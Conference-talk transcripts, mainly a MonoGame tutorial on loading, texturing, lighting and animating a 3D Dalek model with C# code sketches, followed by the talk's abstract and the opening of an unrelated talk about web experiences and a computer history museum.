You can use a model which you've generated in something like Blender, and you can import that in, and you don't have to have these endless arrays of vertices and work out how to break up your model into triangles, because you can't just give it four points. You have to actually sort of decompose that into triangles, and work out what it would be as triangles. So, I wouldn't recommend using this, but you can see that it has the world matrix, and it sort of has just a draw function like before, but we won't go too much into that. We'll go more into how to draw when we come to loading a model, which is a much nicer way. So, you'll see that actually 3D is quite easy. So, on to sort of 3D models. Now, for my... you've got a few nice free options, actually, when it comes to making your own 3D models. There's Google SketchUp, which is quite nice and simple, and if you want to make some sort of simple stuff, then I'd probably recommend that, because it hasn't got a steep learning curve, and you can do pretty much quite a lot of stuff with it. My dad's an architect, and he actually loves SketchUp for doing little sort of quick plans of houses and stuff, because it's just really quick, hence sort of the name SketchUp. It's kind of like 3D sketching. There's still a bit of a learning curve to it, but much easier than the other alternative, which is Blender. Now, Blender is amazing, but it's sort of... it's kind of made for pros. There's lots to it. You need a three-button mouse. There's quite a lot of keyboard shortcuts. It's certainly... it is usable, and there's lots of really nice videos, but it's quite a lot to keep in your head, and I sort of find... I use it maybe every three or four months, and I have to re-watch all the same tutorial videos again, because I've forgotten everything that I thought I knew. It's like, oh, yeah, I know how to... No, I don't. Right, where was that video that I remember watching? But it's a brilliant programme. And then the other option, which is... you might just be able to find some 3D models online. So there's a really nice website called BlenderSwap, where people sort of share the models they've made on Blender, and that's where I've actually got my model for today's talk from. So that's one of the nice sort of things. So... with this, we go back to our game, and we're going to need to load a model. Now... back to Zoom. So Dalek.xnb is the model we're going to be loading. But this does sort of... I mean, I'm running on a Mac, which is brilliant, and you can sort of do all the stuff, I can deploy to iPhone from that. But when it comes to producing content, you need something called the content pipeline. Now, for PNGs and a few other file types, you don't really need to run through this pipeline. What it does is it takes the content for your game, which is going to be sort of your images, your sounds, and your 3D models, and it sort of shrinks them down into this XNB format, which is an XNA format. And that is what is used by the game. Now, as I said, for PNGs, you can just use them straight, you don't have to do that. It's sort of good to, because it makes it more efficient, it sort of shrinks them down quite a lot. But you don't have to. But for 3D models you do, you need to have them in this XNB format. And MonoGame is an open source project, and the content pipeline is a work in progress, and the bit they haven't finished yet is the making 3D models part.
So what you actually have to do, which is a bit of a pain, is you have to create an XNA project with a content project in it, put your models into there, compile them, and then copy them across. It's not difficult, it's just faff. So I'm not going to deeply demo that. So what I've done is I've pre-compiled my lovely Dalek into an XNB format. But if you're making your own games, you have to go through that palaver. They're slowly working on it, and it'll be there at some point, but it isn't just there at the moment. And anyway, because I do, and maybe you would be the same, a lot of my stuff is cross-platform, so I've been working on Windows as well anyway, so it doesn't really matter. So that's the file I'm going to load. And I'm going to, again, like with the texture plane, we're going to load a simple resource, a simple content resource, but then we're going to have an object that stores some extra properties for it as well. So in our load, let's do the Dalek texture equals content.load model and Dalek. And we're going to bung him into this Dalek equals new Dalek model with, which I've called, Dalek texture. That's a very confusing variable name. I apologise. There we go. So now, that's all you need to do to load him up. And then all we need to do to draw him is Dalek.draw and again, pass it the camera just like before. And we can run that and we'll see the amazing Dalek that I've got, which I've been raving about and very excited about. Except he doesn't look quite right. And that's because I'm trying to draw two-dimensional stuff and three-dimensional stuff into the same window. Now, there's nothing wrong with that. You can absolutely do that. But the sprite batch is a bit naughty. It sort of resets lots of properties to the way that it wants them. And it's not the way that 3D stuff wants them. So we're drawing our little dragon in the corner. Now, when we drew one simple shape, the plane, it didn't really matter, but as soon as we've drawn this Dalek, it's sort of culling the wrong faces, bits of the Dalek are going missing. So we need to sort of reset those properties. And it's not something I'd expect anyone to remember. So I've copied it and I've just got it down here. So when the sprite batch ends, we need to reset the stuff for 3D drawing. And you can see it's setting sampler states, blend state and depth stencil state. And I don't really need to know what they are. It's just like a magic reset, and then we will be fine. I mean, the graphics device, I think for sort of optimization, has a lot of switches that sort of get set and you turn them on or off rather than being part of an actual object. So now we see our Dalek. See, much better than a dragon. Much better. So now will probably be a good time to explain how that model has been drawn to screen. It would be lovely if you could just sort of say drawDalek, but actually there's a bit of code behind the scenes. So we've got a class called DalekModel. And the important part is this draw method. And the important part of the draw method is this sort of loop here. So, I'm going to go ahead and draw it here. So, every time we come to draw it to screen, we are looping through various meshes. Now, some models will only have one mesh. It sometimes makes sense to split your object up into several components. So a good example would be a car with wheels, because you want the wheels potentially to move separately to the rest of the car.
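A sketch of the loading and the state reset being described, assuming the helper classes and fields used so far; the three state assignments are the standard XNA/MonoGame way of putting the GraphicsDevice back into a 3D-friendly state after SpriteBatch:

```csharp
// In LoadContent(): load the pre-built .xnb model and wrap it in the helper class
Model dalekModel = Content.Load<Model>("Dalek");
_dalek = new DalekModel(dalekModel);    // DalekModel is the talk's own wrapper class

// In Draw(), after the 2D pass:
_spriteBatch.End();

// SpriteBatch quietly changes several GraphicsDevice states, so put them back
// the way 3D rendering expects them, otherwise depth testing and face culling
// go wrong and bits of the model go missing.
GraphicsDevice.BlendState = BlendState.Opaque;
GraphicsDevice.DepthStencilState = DepthStencilState.Default;
GraphicsDevice.SamplerStates[0] = SamplerState.LinearWrap;

_dalek.Draw(_camera);
```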
If it was a person, there'd be lots of meshes for all the different parts of it that moved. If it was a box, there'd just be one mesh, which would be the box. So you wouldn't have to bother looping through all of them. So, we're going to loop through each of these different subcomponents of the 3D model that we've loaded in, of which there could be any number. I think there are seven in this Dalek. And then each object in the Dalek potentially has a number of sort of effects on it. And each effect is just sort of... It's what sort of draws the surface, and quite often, for a really simple one, again, there's just one effect. But if you want to sort of have reflections, you sort of have these slightly different versions of the same surface, which you have to place in the same point, otherwise you'll sort of get ghosting, where they're sort of in different points. The reflections of your Dalek will be over here, whereas the real Dalek will be over here. So we're looping through all those effects, and then we're just setting various properties on that effect. I'm cheating wonderfully. Well, not cheating, but just taking a shortcut with the lighting. I'm enabling default lighting. There's much sort of smarter things you can do to get really nice lighting effects, but enable default lighting gets you sort of 80% of the way for 20% of the effort. Next, I'm setting the world matrix on that effect, and that's what places it in the 3D world. Again, if I sort of fiddled with that, we'll come back to this part in a second, but effectively, I'm just placing it in the world. Then I'm calling the camera and displaying it, and we'll come to the camera in a second. This part is just because the 3D file might contain some extra little weird transforms. If you don't do that, it doesn't draw quite to the place you expected it to. It's just like a little extra step you have to do. You have to copy the transforms out of the actual model into this little array, and then apply them by multiplying them with where you think the actual object should be. I think particularly when you've got multiple meshes, I think what that is, is just so they don't all get drawn in exactly the same spot, so the different segments of the Dalek will get placed above each other. That's sort of the drawing part. Then what we come to do here is camera dot display, and we display it with the camera. The camera is actually really simple. Display, all it does is set the view and the projection matrix on this object, on that effect. To explain what those are, that's all the camera class is really responsible for doing. It's responsible for keeping track of these two matrices, which take something, a 3D model, lots of little points, and work out where to plot them on a 2D plane so we can see it on our screen. The view is where you're holding the camera. You can see in the constructor here, we gave the constructor the position, the target, the up, and the game window. We store them so we can use them later. Then we just create a look at matrix, which is our view matrix, using those things. You can think of the view matrix as where the camera person is holding the camera and where he's pointing it. Whereas the projection matrix is the sort of camera that he's holding. You could set up a widescreen camera, you could set up an orthographic one where you lose all the 3D effects and everyone's sort of just quite 2D and blocky. In set projection matrix, that's where we create it. All it's really interested in is the screen.
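Putting that loop into code, this is roughly what the draw method being walked through looks like. It is a sketch: _model and the World property are assumed fields on the wrapper class, and camera.Display is the helper shown in the next sketch.

```csharp
// Inside the DalekModel helper class
public void Draw(Camera camera)
{
    // Each mesh may be positioned relative to a parent bone, so copy those
    // transforms out of the model and fold them into the world matrix.
    var boneTransforms = new Matrix[_model.Bones.Count];
    _model.CopyAbsoluteBoneTransformsTo(boneTransforms);

    foreach (ModelMesh mesh in _model.Meshes)
    {
        foreach (BasicEffect effect in mesh.Effects)
        {
            effect.EnableDefaultLighting();   // cheap but decent lighting
            effect.World = boneTransforms[mesh.ParentBone.Index] * World;
            camera.Display(effect);           // sets View and Projection
        }
        mesh.Draw();
    }
}
```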
We use create perspective field of view, which is another lovely helper method on matrix, to create this matrix. The last two properties are the near plane and the far plane. It's just for optimisation, to sort of say, if anything's closer than one unit, don't draw it. If anything's further away than the far plane distance, which in the case of this example is a thousand, don't draw that either. You could set that to be infinite, but the smaller you can set that, the better it will perform. But then you might start missing bits, you'll find things just disappear into nothing because they've fallen off the far plane distance. The screen aspect is just whether it's widescreen or not, and it's width divided by height. The first one is, what's it called? It's sort of the viewing angle. We could make that smaller. Everything's measured in radians, so there are pi radians in... I'll get confused now. Help, how many degrees is pi radians? 180. So pi radians is 180 degrees. This one's got a 90-degree field of view. So we could make that be a 45-degree field of view by doing pi over four and just see how that affects things. Basically, our camera has now thrown that camera away and picked up a new type of camera to see the scene. You can see that we're much closer because we can't see as much stuff. So that's what the camera does. You set it up once, you have these matrices that control the view, and it will turn all your 3D objects into 2D flatness. You could also have animated cameras. A lot of games have a camera that follows the stuff round, so you might have an update method on your camera which keeps track of its position and moves the camera around. There's lots of different forms of that. You might have one. Actually, my game Tower Blocks has a camera that rotates round. So the position it's looking at, the target, always stays the same. But the position just moves around in a circle around it and animates in the update method. So that's our camera. OK, so... We've got a Dalek, that's lovely. He's looking a bit flat, though. Maybe he needs some textures added to him. Now, you can... include textures in the actual model files themselves, or you can load them programmatically, and you might even want to change them during your game if someone changes their outfit or something. So if we go back to our Dalek model, all we want to do is effect. TextureEnabled equals true. Next, he's going to ask us to set an actual texture, but we haven't got one. So let's add one into the constructor. Texture2D... Texture. We'll just store that. I should probably say I've been using Xamarin Studio for this, and it's an absolutely brilliant IDE, actually. But then occasionally you just miss a few things from Visual Studio, and you're like going, no, I can't do that. But it's fully featured, and very nice indeed. So, yeah, we're storing that. And then... TextureEnabled... true. Effect. Texture equals... There it is. So now we're going to have to load up a texture. Actually, we don't need to sort of store it globally. We can just pass it into our object. So here we go. We're loading the Dalek model, and next we will load a Dalek texture. And... I think I've called it Dalek Metal. OK, so we've loaded the texture. We've applied it to each effect in our model. And now when we run it, we should get a slightly... Oh, no! OK, now I can see what I've done. I've forgotten to tell it what sort of thing it's loading. It can't sort of just guess. You need to tell it. There we go. No, I'm doing something very wrong.
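A sketch of that Camera class, assuming the constructor arguments described in the talk; the two Matrix helpers used here are the real XNA/MonoGame ones:

```csharp
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Graphics;

// A sketch of the Camera helper described in the talk.
public class Camera
{
    public Matrix View { get; private set; }
    public Matrix Projection { get; private set; }

    public Camera(Vector3 position, Vector3 target, Vector3 up, GameWindow window)
    {
        // Where the camera operator is standing and where the lens is pointing
        View = Matrix.CreateLookAt(position, target, up);

        // What kind of lens: 90-degree field of view (pi/2 radians),
        // the window's aspect ratio, and the near/far clipping planes
        float aspect = (float)window.ClientBounds.Width / window.ClientBounds.Height;
        Projection = Matrix.CreatePerspectiveFieldOfView(
            MathHelper.PiOver2, aspect, 1f, 1000f);
    }

    // Push both matrices onto an effect just before a mesh is drawn
    public void Display(BasicEffect effect)
    {
        effect.View = View;
        effect.Projection = Projection;
    }
}
```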
Or do I need to do so? Yeah. Thank you, Rune. I didn't mean it when I said your talk was rubbish. There we go. And now we will have a Dalek with a texture on. Now, it's a bit far away. We have to move a little bit closer. So if we go back to where we set up our camera, and we had it sort of 15 away, let's just change that to being 10 away instead. And come in. And appreciate our Dalek in all his glory. It's not the best texture, by the way. Just sort of grabbed it randomly. But you sort of get the idea. So you could find much nicer ones than that. It's supposed to be one of those sort of metal floorways you get with little slats that sort of go backwards and forwards. OK, so we have a Dalek. He looks beautiful. But he's not very threatening because he's staying still. So we're going to have to animate our Dalek next, and get him sort of moving around the screen. OK, we're doing good for time. So this is where the update method comes into play. And we will call Dalek.update. And we pass it the game time. And the game time allows us to keep the speed constant regardless of the frame rate. So the frame rate might be changing. It might be 60 frames a second. It might be two frames a second. Hopefully not two frames a second. But it won't sort of move in different amounts based on that. So we go back into our Dalek model and open up the update method. Now I've sort of prewritten this. Again, we've come back to using a matrix. And this is where we're going to use a create rotation y matrix. And what that does is it takes your object and rotates it round one of the axes. So if your object is standing at 0, 0, 0, right in the middle and you just rotate it around the y, it will just rotate like that. If we were to step a little bit away from the axis, you'd sort of rotate round like that and move round it. And the model angle delta is the amount that it's changed. So the next part is we multiply the existing world by this translation. And that shows one of the nice properties of a matrix, which is it sort of stores all the previous things that happened before it. If you keep on multiplying it by an extra little bit, it will store the new place it's moved to. And you won't have to sort of work out a new thing from scratch each time. So I'm not storing the model angle in this case. I'm just storing the matrix that will take our object from being at 0, 0, 0 and rotate it round the correct amount. So now we've got that, our Dalek will start to become a little bit spinny. Now we have a spinning Dalek, which I was personally very pleased with. And I've sort of made sure that in the model file, the y axis is sort of going down the centre of the Dalek's head. So he sort of spins around that part of his body. Now it might be that we don't just want him to spin. We want him to sort of maybe move around in a bit of a circle. We want to combine two matrices together to move him out from the middle and then rotate him round. Now to do this, we can no longer rely on this little shortcut of not storing the angle. Because when you combine two together, you need to take our Dalek, translate him out to form part of the ring, and then move him round like that. If you want to keep this nice circular shape by translating it round and then spinning him round the middle, it's easier to show. So there's two transforms you want to do. You want to move away from the central spot and then you want to rotate him round that spot like that, so he does both at once.
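A sketch of that update, assuming the wrapper class exposes a World matrix property; scaling the rotation by the elapsed time is what keeps the spin speed independent of frame rate, and the exact speed here is just a guess rather than the talk's value:

```csharp
// Inside DalekModel
public void Update(GameTime gameTime)
{
    // Seconds since the last frame, so the spin speed does not depend on frame rate
    float delta = (float)gameTime.ElapsedGameTime.TotalSeconds;

    // Roughly one radian per second of rotation around the Y axis
    Matrix rotation = Matrix.CreateRotationY(delta);

    // A matrix remembers everything applied so far, so just keep multiplying on
    // this frame's little extra rotation.
    World *= rotation;
}
```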
If you repeatedly apply that translation matrix and just store it once, he'll sort of go all over the place. So what we want to do now is actually introduce a new variable called angle. That's going to, rather than doing what we're doing here, we do underscore angle plus equals the delta. Now we are keeping track of that. Rather than world equaling itself times that, we don't do that part and we just use the full angle there. For now, it's two ways of achieving exactly the same thing. That will look no different on screen, but you get some extra flexibility, which is we're now able to do two together, which is translate him out and then move him round. So he'll go round in a circle. So we'll need a... Sorry, I wrote down what order to do this in. So we times that by a create translation. This is looking for the x, y and z that we want to translate it by in the form of another vector. So we just want to move him along, not up, that would be y. We want to move him sort of forwards. So that's the z. So zero comma zero comma... I don't know how much by now. Two should be a nice sensible number, hopefully. And then if we look at that... Oh, yeah, I shouldn't have made that read only, if I wanted something to keep track of stuff. Okay, so he's not doing what I wanted him to. I wanted him to move round in a circle, but he's actually still just spinning. And what you probably can't tell is he's moved two to the side and then he's spinning on that two spot. Whereas what I wanted him to do was sort of spin a bit and then move out. So I've got the order of those translations the wrong way round. So the order you do them in matters. I typically find I end up doing it by trial and error, but you can work it out in your head. So what I need to do is swap these round. Okay. And maybe you could increase the amount he's moving round by to four. So now we have a patrolling Dalek, much more threatening, much more scary, and again, pisses on the non-moving dragon. Although if the dragon had bubbles, then it'd be more evenly matched. So this is probably a good time to tell my deep, dark, dirty secret about this demo. In that I sort of, I got this model, I was really pleased with it, I was really excited. I was boasting to everyone, mostly Rune, about how beautiful my Dalek was. I've been drawing him to screen, and I've been doing it sort of on my Windows machine to get my demo working. I was like, well, I really want to do it on a Mac to sort of show that you can do the iPhone thing. And the Dalek was juddering. He was hardly moving at all. I measured the frame rate, and the frame rate was two frames per second. I was thinking, that's not acceptable gaming performance. The reason is, this model was made by a guy, oh actually, I should say who the guy was. It's Creative Commons, so I have to say his name, one second. It was by Benji10, and you can find his stuff at blendswap.com, forward slash user, forward slash Benji10, forward slash blends. He loves Daleks, he's done a lot of Daleks, all the way from the 60s to modern-day Daleks. If you love Daleks too, that is a place to get your 3D models of Daleks. But he loves Daleks, and they're incredibly detailed, these models. Down to nuts and bolts, little sort of high polygon nuts and bolts. And in a game, you really need to keep the polygon count down. And this is where I had to sort of go and re-remember how to use Blender to get rid of the majority of the beautifulness of this model.
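The combined version might look something like this sketch; the key point is the multiplication order, since XNA-style matrices apply left to right:

```csharp
// Inside DalekModel: keep the accumulated angle, then rebuild the world matrix each frame
private float _angle;

public void Update(GameTime gameTime)
{
    float delta = (float)gameTime.ElapsedGameTime.TotalSeconds;
    _angle += delta;

    // Order matters: first push the Dalek 4 units out along Z,
    // then rotate that whole arrangement around the Y axis at the origin,
    // which sends him patrolling in a circle of radius 4.
    World = Matrix.CreateTranslation(0, 0, 4) * Matrix.CreateRotationY(_angle);

    // The other order (rotate first, then translate) just leaves him spinning
    // on the spot, four units away from the centre.
}
```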
But I've still not managed to get it to sort of a gaming standard model, and that's my dirty secret. The frame rate of this game, when I last measured it, was five frames per second. Which I can just about get away with. But it sort of shows you that actually performance does matter. On a PC, it runs fine. I mean, people are using MonoGame and the 3D stuff to make, like, Xbox games and PlayStation 4 games. I suspect they're using lower polygon counts than I am as well. But when it comes to doing it on a mobile device, it actually really does count. There are lots of tricks in 3D you can use to simplify things. You can actually have a very simple shape, and you put a beautiful texture on it, which has most of the detail on it. There's no need to have sort of an actual 3D model of a nut on your Dalek when you can just draw a little picture of it and paste that onto the side of it. And I could do an awful lot to get my... I'm not looking at the Dalek, am I? Dalek, where's the Dalek gone? There he is. There's an awful lot you could do to really simplify this model. I mean, I spent quite a long time with Blender simplifying him down, and I've got the frame rate up to five, but there are still hundreds of polygons in this model, and it just doesn't need that many. One of the other tricks that's commonly used in gaming to simplify the number of polygons is to... If you had a whole army of Daleks coming to attack you, only the first few would be real 3D models. A few rows back, there would just be pictures of Daleks on 2D planes, like we saw in the first example, and those would be all the background ones. So you might see these sort of beautiful games that must have like these immense polygon counts, but they're doing all these tricks. The trees in the background, they're not drawing every single leaf individually as a 3D model sort of rustling in the wind. They've just got a picture of a tree back there. So that's my dirty secret. This would not make a well-performing game. But I think I'm probably going to go home and... I want this Dalek to be beautiful, so I'm going to go and sort him out at some point. So we've done that. So there's one last thing we can do... two last things we can do, depending on time. We'll try and fit both in. So the first thing is, as we've said before, he's got all these different meshes to him. All the different parts of the Dalek are actually separate objects in their own right. And if you want the Dalek to be shooting people, like the central bit's going to move, his head's going to move separately, so you can move those independently. So what I'm going to do is set up an array of matrices to control the transforms of all the different meshes there inside him. So matrix array... We'll just call it underscore angles. Actually, we call it mesh angles. And just do for... is less than... I should have had a copy and paste bit for this, I apologise. So first of all, we need to just sort of set them all up with the identity matrix. Oh, yeah, that is not a semicolon. It's close. Mesh angles, i, equals... Oh, did I actually say what the identity matrix is? So the identity matrix is the equivalent of zero or one. It does nothing. So if you transform something by the identity matrix, you know, multiply a matrix by the identity matrix, it's the same as timesing it by one. Nothing will happen to it. It will stay exactly the same. So it's a really nice sort of initial number to set something up with.
So all we're doing there is we're setting up an array of identity matrices, identity matrices that will make no difference whatsoever. And then in our update method, we're going to fiddle with them a little bit. We're going to multiply them all by a rotation matrix around... not comma, dot. There we go. Create rotation y again. And we'll take the same delta angle that we're spinning the model by, but we'll minus it so we'll have it spinning the other way. Model angle delta. And just so they're moving independently, we'll times that by i. So each part of the Dalek will be spinning at a different rate. And then... what order to do this in? When we come here and apply it to the world, we'll also transform each individual mesh by this one inside this array. So mesh angles, i, star. There we go. That's maybe in the wrong order. If it's in the wrong order, we'll know pretty quickly. You still have to create the array. It's going to blow up. You're right. I have to create the array or it's going to blow up. Wait for the blow-up. Blow-up! Excellent. So that goes in the end here. So... mesh angles equals new matrix array. OK. So, hopefully the same as before, but without the lovely blow-up stage. And I've done them in the wrong order. So you see the danger of doing things with... So what you need to do is go back to this line here, and that's obviously in the wrong place. Let's try there. And hope for better this time. OK. So we now have a very dizzy Dalek. You may notice that things aren't actually like... There will be better ways of doing this. Actually, maybe working out which bits are his arms, so just they're spinning round of their own accord. The rest should probably stay locked. So if you had a model like this, rather than just referring to them as different array indexes, like this is index one, this is index two, you'd want to say skirt, head. I don't know what the front gun is, I don't know what the bits of the Dalek are called, rather than this, so you could sort of avoid this terrible, terrible effect. So there's our dizzy Dalek. So... We've got quite far using very simple code, and I think it looks quite beautiful, even though he's not performing exactly as he should. But the textures aren't quite as beautiful as they are in really professional games. They're kind of quite rough. And that's where shaders come in. So that's sort of next on my list of things to learn. Basic effect, which is what we're using to draw all the different parts, is something built into MonoGame and just gives you this really nice, out-of-the-box simple way of doing things. But you can replace that with your own implementation and really fiddle with that, and that gives you a lot more flexibility to sort of have reflections, to say what is reflecting on what, and there are some really nice examples. I'm going to be working through that, so I will be posting blog posts as I learn that. So if it is something you're interested in, then you might want to follow me. So as I learn, hopefully I can share that. But you can do a little bit more with lighting, so you do get some directional lights inside this effect. So whilst you're looping through drawing something, you can fiddle with the lighting a little bit and get some extra sort of things. So if you look inside effect, there are some directional lights. There's three of them sort of built in, and you can place those. And it's quite clever how it works out where a light hits something.
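Pulling those fragments together, a sketch of the per-mesh version; the field names are assumptions, and the three pieces live in the constructor, Update and Draw of the wrapper class respectively:

```csharp
// Field on the wrapper class: one extra transform per mesh
private Matrix[] _meshAngles;

// In the constructor: start every entry as the identity matrix,
// the "multiply by one" matrix that changes nothing.
_meshAngles = new Matrix[_model.Meshes.Count];
for (int i = 0; i < _meshAngles.Length; i++)
    _meshAngles[i] = Matrix.Identity;

// In Update(): spin each mesh the opposite way, at a different rate per mesh
float delta = (float)gameTime.ElapsedGameTime.TotalSeconds;
for (int i = 0; i < _meshAngles.Length; i++)
    _meshAngles[i] *= Matrix.CreateRotationY(-delta * i);

// In Draw(): apply the per-mesh matrix before the bone transform and the world
for (int i = 0; i < _model.Meshes.Count; i++)
{
    ModelMesh mesh = _model.Meshes[i];
    foreach (BasicEffect effect in mesh.Effects)
    {
        effect.EnableDefaultLighting();
        effect.World = _meshAngles[i] * boneTransforms[mesh.ParentBone.Index] * World;
        camera.Display(effect);   // sets View and Projection as before
    }
    mesh.Draw();
}
```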
It doesn't do ray tracing and work out like, you know, I've got this object here and that object there, therefore the light won't possibly be able to see it. It looks at each object in its own right, and it just looks at the surfaces and says, is that surface pointing towards the light source? Yes or no. And that's how it works out whether to, and how much light to, apply to a rendered texture. So let's just set up a quick directional light. So we can set its colour, and there's lots of different colours: the diffuse colour and the specular colour. So the diffuse colour is sort of the main colour of our light. And we'll do, I forgot how you get to colour. There we go, colour.red. So this is a sort of a colour object, but unfortunately directional light is expecting another vector. But luckily we can convert them straight into a vector like that. And now we have a diffuse colour. We can also set its direction. And the direction again is going to be a vector. I worked out last night the best place to have a light, and I've forgotten what it was. So this may look terrible. Three, I think, on the x. Y, keep that one zero. Z, minus four. Try that. And let's see what our Dalek now looks like. Lighting, I think, is really one of those things that you probably don't want to keep on going into the code, changing your values. I bet it's far too red. It's one of those things where you fiddle with the numbers and you get the effect you want, and there's lots of different subtleties to it. And you probably don't want to be going, like I'm going to do now, and you're like, oh, that's not the colour I wanted. Stop, come back in, let's try a lower number on that, see if it gets a bit darker. You probably want to have a little edit thing that allows you to fiddle with those numbers quickly and change the direction and try different things. So the direction, I mean, we only discovered this whilst fiddling around last night, doesn't only control the direction of the light source, it also seems to control the intensity of the light source as well. And you can set up multiple ones and set the directions they're in. So, again, we now have a spinning Dalek, with a directional light on him. But if you wanted to have a really beautiful, shiny Dalek, maybe walking on a ripply watery surface, that's where you'd have to get into shaders, and that is maybe where game development gets a little bit trickier, but still, I think there's just so much stuff you can do, and I really sort of urge you to have a go. It's lots of fun, and it's just a really nice thing. So, just the closing slide. No, not that one. There we go. Thanks for listening. If that says something rude in Norwegian, it's Rune's fault. I'm assuming it says thanks for your attention or something. So you can find out more about MonoGame, have a play, and download all the stuff you need from monogame.net. There's links to the slides on my blog, which is at noginbox.co.uk. If you want to download an amazing game, then you have to go to towerblocks.net immediately, tell all your friends, spread to your... and then just give me amazing reviews. It'd be nice to have reviews from people other than my dad. So thank you very much.
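Picking up the directional-light settings described a moment ago, here is a rough sketch of what they look like in code; the colour and direction values are simply the ones the talk experiments with, and, as noted, a non-normalised direction vector also scales the apparent intensity:

```csharp
// Inside the draw loop, in place of EnableDefaultLighting(): hand-placed lighting
effect.LightingEnabled = true;

effect.DirectionalLight0.Enabled = true;
effect.DirectionalLight0.DiffuseColor = Color.Red.ToVector3();   // main colour of the light, as a Vector3
effect.DirectionalLight0.Direction = new Vector3(3, 0, -4);      // direction (its length also affects intensity)

// Two more built-in slots are available for extra lights:
// effect.DirectionalLight1 and effect.DirectionalLight2.
```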
|
MonoGame is a brilliant games framework that solves the annoying problem of more platforms to develop for than you can throw a hat at. With MonoGame you can develop for them all at once. MonoGame is an open source implementation of XNA. It makes 2D game programming very easy, but a less well known fact is that 3D is also much easier than it seems. This talk will guide you through the basics of 3D game programming. You'll be loading, displaying and moving 3D models with textures and be able to play about with different camera types. By the end, and once you've clocked out from the day job, you'll be ready to create your own 3D gaming masterpiece.
|
10.5446/50858 (DOI)
|
Alright, hey guys. Thanks. It's the last day of the conference, kind of an early session, so thanks for making our talk a priority. It's really nice to have you guys here. So this talk is called The Future of Extreme Web Browsing, and I'm Robbie Ingebretsen, and this is my good friend and colleague Joel Fillmore. And you might be wondering what extreme web browsing is, and the answer is that it's something we made up. I actually know what it is. It seems like a really great name for a talk, and it got you all here, so it worked. So Joel and I together make up the entirety of a company called Pixel Lab, and we are relatively small, as you can see, we're two people. But we've actually done some pretty exciting stuff over the last couple of years. We've worked for some relatively big clients and created some experiences that we're actually really proud of. We're mostly an HTML5 shop, so we primarily work creating sort of futuristic experiences on the web. Like our kind of area of expertise is games and multimedia, sort of things that kind of sit on the edge of what you can do inside of a browser. So this sort of era of innovation in HTML5 has been a really exciting one for us because we've had a chance to do some really exciting things. And in doing that, it's given us some perspective, both on where we've come from as an industry in terms of the types of experiences that you can create, as well as where we're going. And that's kind of what we wanted to talk about today is sort of that transition. And like I mentioned, the focus of what we want to talk about today is this idea of experiences. And when we were thinking about that word or when we think about it, we think it's kind of a funny word because everybody comes to us saying like we want to build this type of an experience. We're interested in user experience. We want a marketing experience. It's almost like when it comes to the web, especially, that's sort of the word that people use instead of an app, right? Not to say that people don't create web apps, but normally people create web experiences. And we think that's kind of a funny word and kind of a new idea that you would create an experience because for a long time, digital things that happened were not really experiences. My dad was a computer developer in the 70s and I don't think my dad was ever thinking about the experiences that he was creating. He was thinking about what the software could do or algorithms or things like that. And now, experiences are something that, sorry, digital experiences are something that we all have. Everybody from my kids to my mom to my grandma is having digital experiences. So kind of with that in mind, we wanted to step back for just a minute and recognize that we're sort of part of a trend, and kind of see where we've come and use that as a way to give us a reference for maybe where we are going in terms of the types of experiences that we can have with digital things.
So you start out at the beginning of the museum and you see some of the first computational machines where they would do simple arithmetic, adding, and then you work through more complicated computers and you finally get to the end and you've sort of taken this tour of computation and computers over history. I thought I'd share a couple of sort of my favorite exhibits. The first one, when you walk into the museum, there's the Babbage Difference Engine. So Charles Babbage conceived this machine that would calculate logarithmic tables, which were pretty tedious to compute and error prone. So he thought, there must be a better way, I can create this machine to do it. He tried to raise funding from the UK government and I believe he raised some money but was never able to fully build the machine. So in the 1990s, a group of scientists who were at the university or the museum of London decided that they were going to finish this thing and they raised some money and actually built it and proved that it could work. They also ran out of funding like Charles Babbage so they weren't able to complete the machine that does the output where they would print out the results of it. And so after a number of years, they found a guy whose name is Nathan Myhrvold who was the former CTO of Microsoft and he said, I will fund the construction of the adding machine on the condition that you build me a replica. So they said, okay, we will do it. So they built the print out so they could get the results from the machine and they built Nathan a second copy. And Nathan is a pretty interesting guy. He's controversial as well for a number of reasons. He's involved in a lot of different things. He is sort of an amateur paleontologist. His home is on Lake Washington and he has a giant T-Rex skeleton that he discovered during one of his digs. So you can imagine he's pretty eccentric. However, his wife really didn't want this in their living room. He had sort of planned like, I'm going to put this in my living room. But as you'll see, I'll show you the video of how this thing works. It has a lot of moving parts so that it can basically manually do the addition of these tables. And so it requires oil to lubricate all the gears. So his wife was concerned about the smell of oil in their living room. This is a quick video, you can see kind of how the machine works. So there's a guy that's actually cranking the gears and it'll add up all the numbers. It's really quite beautiful to watch it in action. So, moving on in the museum, going from the initial adding machines where people would do tedious math, we come to the first example of programs that were written. This is a pretty interesting exhibit. It's a guidance computer from the Apollo moon missions. And this is pretty crazy because they had to weave these by hand and this is read-only memory. So the way it would work is that they would create a program and then they would have people that would actually weave it through. So if they made any mistakes, that was a multiple-day process in order to fix the code. So we should be very grateful for the speed of our modern compilers. It's pretty crazy to think what they had to endure. Further on, they go through the history of the rise of Silicon Valley and VCs. And this is from a bar called the Wagon Wheel, which is a pretty popular bar in Silicon Valley. And so it's a business plan on a napkin. So you draw your specs on the first side.
You fill in the business plan on side two, start the company in your garage, and the final step is throw huge rock parties. So I really don't know what's changed. Like it still feels like it's a little bit the same, kind of crazy. So that was kind of a fun piece of history. As I got towards the end of the museum, we started getting into the first visual computers where they had output. So this is the Alto made by Xerox at their famous PARC laboratory. And this is a really interesting computer because it had a lot of the elements that we today consider just sort of standard parts of a computer. It had a mouse, so it had the user input. It had a visual screen. It had GUIs. It had windows. You can see that the screen itself has got the page orientation. And part of that's because it was Xerox. Like they were a document company. They made documents. And so I think that's an early example of how people looked at new technology and tried to adapt it into a real world experience. So they said, we have documents. If people are going to use computers, they would clearly use them in the page format that they're used to, just like a Xerox machine would. Kind of next to the Xerox machine, there was just a little teapot. And this is a kind of, they had a pretty interesting story behind this teapot. It's called the Utah teapot. And this is famous because it's one of the first examples of 3D. So at the University of Utah, there were a group of computer scientists who were early pioneers in the use of 3D. And one of the professors, Martin Newell, wanted to find some object where he could model something physical in three dimensions on the computer. And so his wife suggested that they use this teapot that she had purchased at a drug store. And so this has become sort of the hello world of graphics packages. Like oftentimes you'll have libraries that will draw teapots. And it's sort of the first thing that every 3D library shows you how to do is the teapot. So after I went through this kind of really fun trip for me, touring the museum, I came back and I was telling Robbie about all the fun things that they had. And I mentioned that they had this teapot, which was actually one of the first 3D models that they had done. And Robbie said, well, that's funny because my dad was actually at the University of Utah. I was like, what? So we actually had a teapot in our house growing up just like this, because I grew up in Utah. And my dad was a master's student at the University of Utah at around the same 